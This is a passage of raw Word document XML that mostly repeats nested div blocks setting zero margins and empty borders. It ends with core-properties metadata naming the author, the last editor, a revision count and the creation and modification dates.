              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1290279410">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="19859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47042">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="1858033371">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1338532923">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="66001982">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="881328442">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="13284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7184">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
          </w:divsChild>
        </w:div>
        <w:div w:id="594947161">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="913591479">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="573054638">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1277719167">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="3817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Vardhan Singh</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Saurabh Singh Shekhawat</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-11-14T17:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-05-14T17:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>